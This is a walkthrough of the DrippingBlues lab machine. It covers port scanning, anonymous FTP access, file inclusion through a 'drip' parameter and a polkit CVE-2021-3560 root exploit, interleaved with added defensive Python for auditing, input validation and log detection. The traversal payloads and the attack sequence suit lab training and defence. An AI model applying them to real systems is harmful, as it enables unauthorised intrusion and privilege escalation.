┌──(mikannse㉿kali)-[~/vulnhub/DrippingBlues]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 13:47 CST
Nmap scan report for 192.168.56.139
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:13:FC:AA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.80 seconds
┌──(mikannse㉿kali)-[~/vulnhub/DrippingBlues]
└─$ sudo nmap -sT -sC -sV -O -p21,22,80 192.168.56.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 13:48 CST
Nmap scan report for 192.168.56.139
Host is up (0.00043s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.131
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
|   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:13:FC:AA (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.06 seconds
Getshell
FTP allows anonymous login, and there is a zip archive on it; download it.
┌──(mikannse㉿kali)-[~/vulnhub/DrippingBlues]
└─$ ftp 192.168.56.139
Connected to 192.168.56.139.
220 (vsFTPd 3.0.3)
Name (192.168.56.139:mikannse): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||54984|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip
226 Directory send OK.
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||19939|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |********************************************************|   471       50.07 KiB/s    00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (47.66 KiB/s)
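The scan and the FTP session above show the two things a defender would want to catch on this host: anonymous logins are accepted, the control and data connections are cleartext, and the file in the anonymous root is world-writable. The following is an added example (not code from the write-up or from the box) that audits a vsftpd configuration for exactly those settings and scans an `ls`-style listing for world-writable entries. Both configuration texts and the listing line are constructed samples; the built-in defaults are the ones documented in vsftpd.conf(5) and are assumed so that a directive missing from the file is still evaluated.

```python
"""Audit a vsftpd configuration for anonymous-access and cleartext risks.

Constructed example. The configuration texts below are made up to resemble
a vsftpd 3.0.3 service that would produce the scan findings above; nothing
here is copied from the target machine.
"""
import re
from typing import Dict, List

# Built-in vsftpd defaults as documented in vsftpd.conf(5); assumed here so
# that a directive absent from the file is still checked.
VSFTPD_DEFAULTS = {
    "anonymous_enable": "YES",
    "local_enable": "NO",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "anon_other_write_enable": "NO",
    "ssl_enable": "NO",
    "chroot_local_user": "NO",
}

# Constructed configuration reproducing the weak state the scan reported.
WEAK_CONF = """\
# vsftpd.conf (constructed sample)
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_other_write_enable=YES
"""

# Constructed hardened counterpart: no anonymous access, TLS enforced,
# local users confined to their home directory.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""

# Constructed directory listing line in the format the ftp client printed.
SAMPLE_LISTING = "-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip\n"


def parse_vsftpd_conf(text: str) -> Dict[str, str]:
    """Parse key=value lines over the assumed defaults; comments are skipped."""
    conf = dict(VSFTPD_DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip().lower()] = value.strip().upper()
    return conf


def audit_vsftpd(conf: Dict[str, str]) -> List[str]:
    """Return human-readable findings for risky effective settings."""
    findings = []
    if conf["anonymous_enable"] == "YES":
        findings.append("anonymous_enable=YES: anonymous logins accepted")
        # The anon_* write switches only take effect when write_enable is on.
        if conf["write_enable"] == "YES":
            for directive in ("anon_upload_enable", "anon_mkdir_write_enable",
                              "anon_other_write_enable"):
                if conf[directive] == "YES":
                    findings.append(f"{directive}=YES: anonymous users can modify the FTP tree")
    if conf["ssl_enable"] != "YES":
        findings.append("ssl_enable=NO: credentials and data travel in cleartext")
    if conf["local_enable"] == "YES" and conf["chroot_local_user"] != "YES":
        findings.append("chroot_local_user=NO: local users can browse outside their home")
    return findings


# mode, links, owner, group, size, month, day, year-or-time, name
LS_LINE = re.compile(
    r"^([-dl])([rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$")


def world_writable_entries(listing: str) -> List[str]:
    """Names from an ls -l style listing whose 'other' write bit is set."""
    names = []
    for line in listing.splitlines():
        match = LS_LINE.match(line.strip())
        if match and match.group(2)[7] == "w":
            names.append(match.group(3))
    return names


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}]")
        for finding in audit_vsftpd(parse_vsftpd_conf(text)) or ["no findings"]:
            print("  -", finding)
    print("world-writable:", world_writable_entries(SAMPLE_LISTING))
```

Run against a real `/etc/vsftpd.conf` by reading the file into `parse_vsftpd_conf`; the world-writable check applies equally to the output of `ls -l` on the anonymous root, which is where a drop-box file like the one found here would show up.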
┌──(mikannse㉿kali)-[~/vulnhub/DrippingBlues]
└─$ feroxbuster -u http://192.168.56.139/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,html,bak,pdf,php --filter-status 404
<SNIP>
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        9l       21w      138c http://192.168.56.139/index.php
200      GET        9l       21w      138c http://192.168.56.139/
200      GET        3l        6w       78c http://192.168.56.139/robots.txt
Combined with the note's hint to focus on "drip", the parameter is guessed to be drip; the file inclusion succeeds, and it yields a user named thugger.
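The inclusion works because the page passes the `drip` value straight to an include with no constraint on where it may point. The box's index.php is not shown in the write-up, so the following is an added example (not the target's code) in Python rather than PHP: it contrasts the unvalidated pattern with a hardened resolver that only accepts a short page key under a fixed directory, and adds a log check that flags requests whose `drip` value is an absolute path, a traversal sequence, a stream wrapper or contains a NUL byte. The document root, the `pages` directory and the access-log lines are constructed assumptions.

```python
"""Unvalidated include parameter beside a constrained resolver, plus a
detection pass over web-server access logs.

Constructed example; the `drip` parameter name is taken from the write-up,
everything else (paths, page names, log lines) is assumed.
"""
import posixpath
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/var/www/html"                # assumed Apache document root
PAGES_DIR = posixpath.join(WEB_ROOT, "pages")  # assumed directory of includable pages

# Constructed Apache combined-log lines: one normal page request, two
# inclusion attempts of the kind the write-up describes, one unrelated hit.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Oct/2024:13:50:01 +0800] "GET /index.php?drip=about HTTP/1.1" 200 138',
    '192.0.2.10 - - [03/Oct/2024:13:50:07 +0800] "GET /index.php?drip=../../etc/passwd HTTP/1.1" 200 2044',
    '192.0.2.10 - - [03/Oct/2024:13:50:09 +0800] "GET /index.php?drip=/etc/dripispowerful.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [03/Oct/2024:13:50:15 +0800] "GET /robots.txt HTTP/1.1" 200 78',
]


def unsafe_include_path(drip: str) -> str:
    """Mirrors include($_GET['drip']) with no validation: whatever the client
    sends (absolute path, traversal, wrapper) is what gets included."""
    return drip


def hardened_include_path(drip: str) -> Optional[str]:
    """Accept only a bare page key and map it to a .html file under PAGES_DIR."""
    if not drip or "\x00" in drip or drip.startswith("/"):
        return None
    # A strict character class rules out dots, slashes and scheme separators,
    # so neither traversal nor php:// style wrappers can be expressed.
    if not re.fullmatch(r"[A-Za-z0-9_-]+", drip):
        return None
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, drip + ".html"))
    # Belt-and-braces containment check after normalisation.
    if not candidate.startswith(PAGES_DIR + "/"):
        return None
    return candidate


# Absolute path, parent-directory step, scheme/wrapper prefix, or NUL byte.
SUSPICIOUS_VALUE = re.compile(r"^/|\.\./|^[A-Za-z][A-Za-z0-9+.-]*://|\x00")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def flag_include_abuse(log_lines: List[str], param: str = "drip") -> List[str]:
    """Return the log lines whose `param` query value looks like an inclusion
    attempt rather than a page key."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query)
        # parse_qs already URL-decodes once; a second unquote catches
        # double-encoded values such as %252e%252e.
        if any(SUSPICIOUS_VALUE.search(unquote(v)) for v in query.get(param, [])):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for value in ("about", "../../etc/passwd", "/etc/dripispowerful.html"):
        print(f"{value!r:40} unsafe -> {unsafe_include_path(value)!r:30} "
              f"hardened -> {hardened_include_path(value)!r}")
    print("flagged log lines:")
    for line in flag_include_abuse(SAMPLE_LOG):
        print("  ", line)
```

The resolver deliberately refuses rather than sanitises: stripping `../` from a value and continuing is the usual way such fixes get bypassed, whereas rejecting anything outside the expected character set leaves nothing to bypass. The log check is the same idea in reverse and is cheap enough to run over the whole access log when triaging a host like this one.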
thugger@drippingblues:/tmp$ python3 pwn.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit
<SNIP>
root@drippingblues:/tmp# whoami
root
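The polkit bug itself is fixed by updating the polkit package, but the public exploit linked in the banner above gets root by having accounts-daemon create a new local account in the sudo group, so the durable trace it leaves on a host is an account that nobody provisioned. The following is an added example (not part of the write-up or the exploit) that diffs the current `/etc/passwd` and `/etc/group` against a known-good baseline and reports new human accounts, extra UID 0 entries and anyone who gained admin-group membership. The baseline and current file contents are constructed samples; `thugger` is the account from the write-up and `extra` is an assumed name for an account the exploit might have added.

```python
"""Detect local accounts that appeared outside the provisioning baseline.

Constructed example: all passwd/group contents below are made up. The check
targets the side effect of the polkit exploit run above, which creates a
new sudo-group user through accounts-daemon.
"""
from typing import Dict, List, Set, Tuple

ADMIN_GROUPS = {"sudo", "wheel", "admin"}   # groups treated as root-equivalent
UID_MIN = 1000                              # Debian/Ubuntu first human UID

# Constructed baseline taken (hypothetically) when the box was built.
BASE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
thugger:x:1000:1000:thugger,,,:/home/thugger:/bin/bash
"""
BASE_GROUP = """\
root:x:0:
sudo:x:27:
www-data:x:33:
thugger:x:1000:
"""

# Constructed post-incident state: a new account that also sits in sudo.
CUR_PASSWD = BASE_PASSWD + "extra:x:1001:1001:Extra Account:/home/extra:/bin/bash\n"
CUR_GROUP = """\
root:x:0:
sudo:x:27:extra
www-data:x:33:
thugger:x:1000:
extra:x:1001:
"""


def parse_passwd(text: str) -> Dict[str, Tuple[int, int]]:
    """Map user name -> (uid, primary gid) from passwd(5) formatted text."""
    users: Dict[str, Tuple[int, int]] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and not line.startswith("#"):
            users[fields[0]] = (int(fields[2]), int(fields[3]))
    return users


def parse_group(text: str) -> Dict[str, Tuple[int, Set[str]]]:
    """Map group name -> (gid, supplementary members) from group(5) text."""
    groups: Dict[str, Tuple[int, Set[str]]] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and not line.startswith("#"):
            members = {m for m in fields[3].split(",") if m}
            groups[fields[0]] = (int(fields[2]), members)
    return groups


def privileged_users(users: Dict[str, Tuple[int, int]],
                     groups: Dict[str, Tuple[int, Set[str]]]) -> Set[str]:
    """Users with uid 0 or admin-group membership (primary or supplementary)."""
    privileged = {name for name, (uid, _) in users.items() if uid == 0}
    admin_gids = set()
    for group, (gid, members) in groups.items():
        if group in ADMIN_GROUPS:
            admin_gids.add(gid)
            privileged |= members
    privileged |= {name for name, (_, gid) in users.items() if gid in admin_gids}
    return privileged


def detect_account_drift(base_passwd: str, base_group: str,
                         cur_passwd: str, cur_group: str) -> List[str]:
    """Findings describing accounts or privileges absent from the baseline."""
    base_u, cur_u = parse_passwd(base_passwd), parse_passwd(cur_passwd)
    base_g, cur_g = parse_group(base_group), parse_group(cur_group)
    findings = []
    for name, (uid, _) in sorted(cur_u.items()):
        if name not in base_u and uid >= UID_MIN:
            findings.append(f"new local account {name!r} (uid {uid}) not in baseline")
        if uid == 0 and name != "root":
            findings.append(f"account {name!r} has uid 0")
    gained = privileged_users(cur_u, cur_g) - privileged_users(base_u, base_g)
    for name in sorted(gained):
        findings.append(f"{name!r} gained root-equivalent group membership")
    return findings


if __name__ == "__main__":
    for finding in detect_account_drift(BASE_PASSWD, BASE_GROUP, CUR_PASSWD, CUR_GROUP):
        print("-", finding)
```

On a live host, feed the script the real files (`open("/etc/passwd").read()` and so on) against a baseline captured at build time or pulled from configuration management; a non-empty result on a box that should not be creating accounts is worth an immediate look, and patching polkit removes the route this particular exploit uses to create them.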